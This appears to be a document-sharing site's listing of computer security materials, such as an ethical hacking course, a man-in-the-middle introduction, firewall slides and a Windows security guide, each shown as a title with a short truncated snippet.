ETHICAL HACKING & COMPUTER FORENSIC SECURITY

ETHICAL HACKING & COMPUTER FORENSIC SECURITY ETHICAL HACKING & COMPUTER FORENSIC SECURITY Course Description From forensic computing to network security, the course covers a wide range of subjects. You will learn about web hacking, password cracking,

More information

Transforming Security from Defense in Depth to Comprehensive Security Assurance

Transforming Security from Defense in Depth to Comprehensive Security Assurance Transforming Security from Defense in Depth to Comprehensive Security Assurance February 28, 2016 Revision #3 Table of Contents Introduction... 3 The problem: defense in depth is not working... 3 The new

More information

Protegent Total Security Solution USER GUIDE Unistal Systems Pvt. Ltd. All rights Reserved Page 1

Protegent Total Security Solution USER GUIDE Unistal Systems Pvt. Ltd. All rights Reserved Page 1 Protegent Total Security Solution USER GUIDE 2007-2017 Unistal Systems Pvt. Ltd. All rights Reserved Page 1 Table of Contents PROTEGENT TOTAL SECURITY...3 INSTALLATION...4 REGISTERING PROTEGENT TOTAL SECURITY...

More information

An introduction to wireless security at home, on the road and on campus. Sherry Callahan and Kyle Crane

An introduction to wireless security at home, on the road and on campus. Sherry Callahan and Kyle Crane Out of Thin Air! An introduction to wireless security at home, on the road and on campus Sherry Callahan and Kyle Crane University of Kansas Medical Center October 5, 2009 Wireless Networking at Home Sherry

More information

Man in the middle. Bởi: Hung Tran

Man in the middle. Bởi: Hung Tran Man in the middle Bởi: Hung Tran INTRODUCTION In today society people rely a lot on the Internet for studying, doing research and doing business. Internet becomes an integral part of modern life and many

More information

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account ETHICAL HACKING LAB SERIES Lab 3: Using the SYSTEM Account Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution

More information

ACS-3921/ Computer Security And Privacy. Chapter 9 Firewalls and Intrusion Prevention Systems

ACS-3921/ Computer Security And Privacy. Chapter 9 Firewalls and Intrusion Prevention Systems ACS-3921/4921-001 Computer Security And Privacy Chapter 9 Firewalls and Intrusion Prevention Systems ACS-3921/4921-001 Slides Used In The Course A note on the use of these slides: These slides has been

More information

Define information security Define security as process, not point product.

Define information security Define security as process, not point product. CSA 223 Network and Web Security Chapter One What is information security. Look at: Define information security Define security as process, not point product. Define information security Information is

More information

G/On OS Security Model

G/On OS Security Model Whitepaper G/On OS Security Model Technical Whitepaper with Excitor comments on CESG Guidance 1 About this document This document describes the security properties of G/On OS, which is a Linux based, client

More information

CoreMax Consulting s Cyber Security Roadmap

CoreMax Consulting s Cyber Security Roadmap CoreMax Consulting s Cyber Security Roadmap What is a Cyber Security Roadmap? The CoreMax consulting cyber security unit has created a simple process to access the unique needs of each client and allows

More information

Configuring Windows Security Features

Configuring Windows Security Features 04_0789737213_ch03.qxd 10/26/07 3:31 PM Page 77 3 CHAPTER THREE Configuring Windows Security Features This chapter covers the following objectives: Configure and troubleshoot User Account Control. Configure

More information